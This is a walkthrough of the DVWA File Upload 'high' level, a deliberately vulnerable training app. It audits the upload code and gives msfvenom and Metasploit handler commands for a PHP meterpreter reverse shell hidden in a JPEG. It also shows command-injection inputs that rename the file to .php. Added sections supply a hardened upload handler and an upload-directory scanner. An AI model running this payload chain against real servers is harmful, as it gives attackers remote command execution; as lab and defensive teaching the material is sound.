DVWA File Upload level high 通关

Since the security level is set to high:

1. Code audit

```php
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
```

As the code shows, three things are checked: the file extension (only jpg, jpeg or png), the file size (under 100000 bytes) and the file content (getimagesize must recognise it as an image).

2. Use msfvenom to generate the shellcode

```
# lhost is the listener's IP (usually this machine); lport is the listening port
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.ip.ip lport=3333 -f raw >> shell3.jpeg
```

3. To get past the getimagesize check, open shell3.jpeg in vi and add a line at the very top containing GIF98

4. Upload the file

5. From the menu, go to Command Injection. Command injection is needed to change the file's extension from jpeg to php, so that when the file is requested later the server executes it. In the input box, enter:
```
# look at the file
127.0.0.1|ls /app/hackable/uploads/shell3.jpeg
# copy it
127.0.0.1|cp /app/hackable/uploads/shell3.jpeg /app/hackable/uploads/shell3.php
```

6. Start msf and wait for our shellcode to connect back

```
msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.ip.ip
lhost => 192.168.ip.ip
msf6 exploit(multi/handler) > set lport 3333
lport => 3333
msf6 exploit(multi/handler) > run
```

7. In the browser, open http://192.168.靶机.ip/hackable/uploads/shell3.php (where 192.168.靶机.ip is the target machine's IP)

8. msfconsole will show the incoming connection, and you can now run commands on the target machine
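The walkthrough above works because the high-level handler trusts the user-supplied filename for the stored path and accepts any file that merely starts with an image header. The following is an added example, not DVWA's own code, showing a hardened version of the same handler: the type is taken from the file content, the image is re-encoded with GD so that bytes appended after the image data are discarded, and the stored name is generated by the server. It assumes the GD and fileinfo extensions are loaded and that DVWA_WEB_PAGE_TO_ROOT is defined as in DVWA; the directory name hackable/uploads/ is DVWA's own.

```php
<?php
// Added example (not DVWA's code): hardened replacement for the high-level upload handler.
// Assumes the GD and fileinfo extensions are available.

function handle_upload(array $file, string $upload_dir): string
{
    // Reject anything PHP itself already flagged (partial upload, ini size limits, ...).
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return 'Your image was not uploaded.';
    }
    // Same size limit as the original handler (bytes).
    if ($file['size'] >= 100000) {
        return 'Your image was not uploaded. The file is too large.';
    }
    // Only accept a file that really came through this request's upload.
    if (!is_uploaded_file($file['tmp_name'])) {
        return 'Your image was not uploaded.';
    }

    // 1. Decide the type from the bytes on disk, never from $file['name'].
    $finfo   = new finfo(FILEINFO_MIME_TYPE);
    $mime    = $finfo->file($file['tmp_name']);
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png'];
    if (!isset($allowed[$mime])) {
        return 'Your image was not uploaded. We can only accept JPEG or PNG images.';
    }

    // 2. Fully decode the image. A file that only carries an image-looking header
    //    (for example a "GIF" prefix followed by script text) fails to decode here,
    //    and a genuine image is rebuilt pixel by pixel, so trailing payload is lost.
    $img = ($mime === 'image/jpeg')
        ? @imagecreatefromjpeg($file['tmp_name'])
        : @imagecreatefrompng($file['tmp_name']);
    if ($img === false) {
        return 'Your image was not uploaded. The file is not a valid image.';
    }

    // 3. The server picks the stored name: random, with an extension derived from the
    //    detected MIME type. The client's filename never touches the filesystem, so a
    //    later rename via another bug has no predictable path to work with.
    $ext      = $allowed[$mime];
    $new_name = bin2hex(random_bytes(16)) . '.' . $ext;
    $target   = rtrim($upload_dir, '/') . '/' . $new_name;

    if ($ext === 'png') {
        imagealphablending($img, false);
        imagesavealpha($img, true);
        $ok = imagepng($img, $target);
    } else {
        $ok = imagejpeg($img, $target, 90);
    }
    imagedestroy($img);
    if (!$ok) {
        return 'Your image was not uploaded.';
    }
    // Stored uploads are data, not programs.
    chmod($target, 0644);

    return htmlspecialchars($new_name, ENT_QUOTES, 'UTF-8') . ' successfully uploaded!';
}

if (isset($_POST['Upload']) && isset($_FILES['uploaded'])) {
    $upload_dir = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    echo '<pre>' . handle_upload($_FILES['uploaded'], $upload_dir) . '</pre>';
}
```

Re-encoding is the step that matters most: a content check alone (finfo or getimagesize) only looks at the header, while decoding and rewriting the pixels means nothing but image data survives. Independently of the handler, the web server should be configured so that nothing under the uploads directory is ever passed to the PHP interpreter; then even a file that does end up with a .php name is served as bytes rather than executed.

A second added example, also not from the post: a defender-side check that walks the same upload directory and reports files a web server would execute, files that contain a PHP open tag regardless of their extension, and files whose extension disagrees with their real content. The path /app/hackable/uploads is the one used in the walkthrough; the fileinfo extension is assumed to be available.

```php
<?php
// Added example (not DVWA's code): audit an upload directory for files that should not be there.
// Assumes the fileinfo extension is available.

function scan_uploads(string $dir): array
{
    $executable = ['php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar'];
    $mime_ext   = [
        'image/jpeg' => ['jpg', 'jpeg'],
        'image/png'  => ['png'],
        'image/gif'  => ['gif'],
    ];
    $finfo    = new finfo(FILEINFO_MIME_TYPE);
    $findings = [];

    foreach (new DirectoryIterator($dir) as $entry) {
        if ($entry->isDot() || !$entry->isFile()) {
            continue;
        }
        $path = $entry->getPathname();
        $ext  = strtolower($entry->getExtension());
        $mime = $finfo->file($path) ?: 'unknown';
        // Read at most 1 MiB: enough to see script text placed after an image header.
        $head = (string) @file_get_contents($path, false, null, 0, 1048576);
        $why  = [];

        if (in_array($ext, $executable, true)) {
            $why[] = "extension .$ext is executed by the web server";
        }
        if (preg_match('/<\?(php\b|=)/i', $head)) {
            $why[] = 'contains a PHP open tag';
        }
        if (isset($mime_ext[$mime])) {
            if (!in_array($ext, $mime_ext[$mime], true)) {
                $why[] = "content is $mime but the extension is .$ext";
            }
        } else {
            $why[] = "content type $mime is not an allowed image type";
        }
        if ($why) {
            $findings[$path] = $why;
        }
    }
    return $findings;
}

foreach (scan_uploads('/app/hackable/uploads') as $path => $reasons) {
    echo $path, PHP_EOL;
    foreach ($reasons as $reason) {
        echo '  - ', $reason, PHP_EOL;
    }
}
```

Run from cron or after each deployment, this turns the copy-and-rename step of the walkthrough into a visible event: a .php file in the uploads directory is reported on every run, and a .jpeg whose content is not a real JPEG is reported even before it is renamed.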
PS: weevely can achieve the same result. The only difference is that weevely acts as the client and connects out to the shellcode on the target, whereas msf acts as the server and waits for the target's shellcode to connect back.

Reference: https://www.hackingarticles.in/hack-file-upload-vulnerability-dvwa-bypass-security/
